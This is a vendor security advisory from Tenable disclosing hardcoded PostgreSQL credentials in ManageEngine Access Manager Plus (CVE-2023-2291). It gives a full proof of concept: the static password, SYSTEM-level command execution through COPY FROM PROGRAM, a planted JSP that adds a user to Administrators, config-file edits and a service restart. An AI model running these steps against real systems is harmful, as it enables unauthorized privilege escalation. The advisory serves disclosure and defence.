Facebook Google Plus Twitter LinkedIn YouTube RSS Menu Search Resource - BlogResource - WebinarResource - ReportResource - Eventicons_066 icons_067icons_068icons_069icons_070

Zoho ManageEngine Disclosure of Hardcoded Credentials

High

Synopsis

Static credentials exist in the PostgreSQL data used in ManageEngine Access Manager Plus (AMP) build 4309. These credentials could allow a malicious actor to modify configuration data that would escalate their permissions from that of a low-privileged user to an Administrative user.

The PostgreSQL database server used in AMP is run under the SYSTEM account:

C:\Program Files\ManageEngine\AMP\pgsql\bin>set PGPASSWORD=Stonebraker&& psql -h 127.0.0.1 -p 4567 -d AMP -U postgres -q
AMP=# DROP TABLE IF EXISTS cmd_exec;
NOTICE:  table "cmd_exec" does not exist, skipping
AMP=# CREATE TABLE cmd_exec(cmd_output text);
AMP=# COPY cmd_exec FROM PROGRAM 'whoami /user /groups' with (format csv, DELIMITER E'\t');
AMP=# select * from cmd_exec;



 USER INFORMATION
 ----------------

 User Name           SID
 =================== ========
 nt authority\system S-1-5-18


 GROUP INFORMATION
 -----------------

 Group Name                             Type             SID          Attributes
 ====================================== ================ ============ ==================================================
 BUILTIN\Administrators                 Alias            S-1-5-32-544 Group used for deny only
 Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
 NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
 Mandatory Label\System Mandatory Level Label            S-1-16-16384
(18 rows)


AMP=#
 

As shown above, the SYSTEM account is a member of the local Administrators group, but its membership is only used when checking for access-denied ACEs that apply to SID S-1-5-32-544. Access-allowed ACEs for the SID are ignored. This means SYSTEM does not have permissions granted to the local Administrators group.

As a result, operations such as adding a low-privileged user to the local Administrators group would fail (Access Denied):

C:\Program Files\ManageEngine\AMP\pgsql\bin>set PGPASSWORD=Stonebraker&& psql -h 127.0.0.1 -p 4567 -d AMP -U postgres -q
AMP=# DROP TABLE IF EXISTS cmd_exec;
NOTICE:  table "cmd_exec" does not exist, skipping
AMP=# CREATE TABLE cmd_exec(cmd_output text);
AMP=# COPY cmd_exec FROM PROGRAM 'net localgroup administrators user1 /add > c:\\Windows\\Temp\\out.txt 2>&1';
ERROR:  program "net localgroup administrators user1 /add > C:\\Windows\\Temp\\out.txt 2>&1" failed
DETAIL:  child process exited with exit code 2
AMP=# COPY cmd_exec FROM 'C:\\Windows\\Temp\\out.txt';
AMP=# select * from cmd_exec;
          cmd_output
------------------------------
 System error 5 has occurred.

 Access is denied.

(4 rows)


AMP=#


However, the ManageEngine Access Manager Plus (AMP) Windows service (Tomcat java.exe) is running with administrative privileges. The low-privileged user running commands as the PostgreSQL server can change AMP configuration files and restart the AMP service. The user can drop a JSP file to the AMP webapp root and cause it to be executed under the security context of the AMP service. This allows the user to add themselves to the local Administrators group.  

Proof of Concept
Create a low-privileged Windows user (i.e., user1 with membership in Users and Remote Desktop Users)

Create a JSP file (i.e., test.jsp) that adds the low-privileged user to the Administrators group
<% Runtime.getRuntime().exec("cmd /c \"net localgroup Administrators user1 /add\""); %>

Login as user1 to the AMP Windows host and verify user1 is not a member in the Administrators group
C:\Users\user1>net user user1 | findstr Administrators
C:\Users\user1>


Login to the local PostgreSQL server using the hard-coded credentials
C:\Users\user1>cd C:\Program Files\ManageEngine\AMP\pgsql\bin
C:\Program Files\ManageEngine\AMP\pgsql\bin>set PGPASSWORD=Stonebraker&& psql -h 127.0.0.1 -p 4567 -d AMP -U postgres


Copy the JSP file to the AMP webapp root under the context of the SYSTEM account
AMP=# DROP TABLE IF EXISTS cmd_exec;
AMP=# CREATE TABLE cmd_exec(cmd_output text);
AMP=# COPY cmd_exec FROM PROGRAM 'copy c:\users\user1\test.jsp "C:\Program Files\ManageEngine\AMP\webapps\Amp\"';


Copy security-common-onpremise.xml to user's home directory
AMP=# COPY cmd_exec FROM PROGRAM 'copy "C:\Program Files\ManageEngine\AMP\conf\security-common-onpremise.xml" c:\users\user1\';

Add the following URL entry under the <urls> element in security-common-onpremise.xml. This is to ensure that /test.jsp will not be blocked by the SecurityFilter.
<url path="/test.jsp" description="" method="get,post"/>

Copy the modified security-common-onpremise.xml back to its location
AMP=# COPY cmd_exec FROM PROGRAM 'copy c:\users\user1\security-common-onpremise.xml "C:\Program Files\ManageEngine\AMP\conf\"';

Copy tomcat web.xml to user's home directory
AMP=# COPY cmd_exec FROM PROGRAM 'copy "C:\Program Files\ManageEngine\AMP\conf\web.xml" c:\users\user1\';

Add the following configuration under the <web-app> element in web.xml. This allows /test.jsp to be executed by the JSP servlet.
<servlet>
    <servlet-name>jsp</servlet-name>
    <servlet-class>org.apache.jasper.servlet.JspServlet</servlet-class>
    <init-param>
        <param-name>fork</param-name>
        <param-value>false</param-value>
    </init-param>
    <load-on-startup>1</load-on-startup>
</servlet>
<servlet-mapping>
    <servlet-name>jsp</servlet-name>
    <url-pattern>*.jsp</url-pattern>
</servlet-mapping>  


Copy the modified web.xml back to its location
AMP=# COPY cmd_exec FROM PROGRAM 'copy c:\users\user1\web.xml "C:\Program Files\ManageEngine\AMP\conf\"';
 

Restart the AMP service so that the modified web.xml and security-common-onpremise.xml can take effect
Note that restarting the AMP service will drop the PostgreSQL connection because the PostgreSQL server is launched by the AMP service
AMP=# COPY cmd_exec FROM PROGRAM 'powershell.exe -Command "Restart-Service amp -Force"';

Wait until the AMP service restarted by checking https://<amp-host>:9292/ in a web browser
Execute /test.jsp to add user1 to Administrators
curl -ski 'https://<amp-host>:9292/test.jsp'

Logoff user1 and log back in to check user membership again
C:\Users\user1>net user user1 | findstr Administrators
Local Group Memberships      *Administrators       *Remote Desktop Users

C:\Users\user1>
 

Solution

No vendor-supplied solution is available at this time. Please contact ManageEngine support for mitigation assistance.

Disclosure Timeline

January 23, 2023 - Tenable discloses information to vendor.
January 23, 2023 - Vendor acknowledges receipt.
February 22, 2023 - Tenable requests status update.
February 23, 2023 - Vendor acknowledges request. States that patches are in progress.
March 6, 2023 - Tenable requests status update.
March 7, 2023 - Vendor acknowledges request and states that patches should be released this month. They have stated that they will notify us prior to release.
April 5, 2023 - Tenable requests status update.
April 7, 2023 - Vendor states that patches are not ready to be released but will be released in the coming weeks.
April 21, 2023 - Tenable reminds vendor of disclosure deadline.
April 24, 2023 - Vendor requests disclosure timeline extension.
April 25, 2023 - Tenable denies request citing policy referenced in original disclosure.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]

Risk Information

CVE ID: CVE-2023-2291
Tenable Advisory ID: TRA-2023-16
CVSSv3 Base / Temporal Score:
8.8 / 8.3
CVSSv3 Vector:
AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
Affected Products:
ManageEngine Access Manager Plus
ManageEngine Password Manager Pro
ManageEngine PAM360
Risk Factor:
High

Advisory Timeline

April 25, 2023 - Initial release.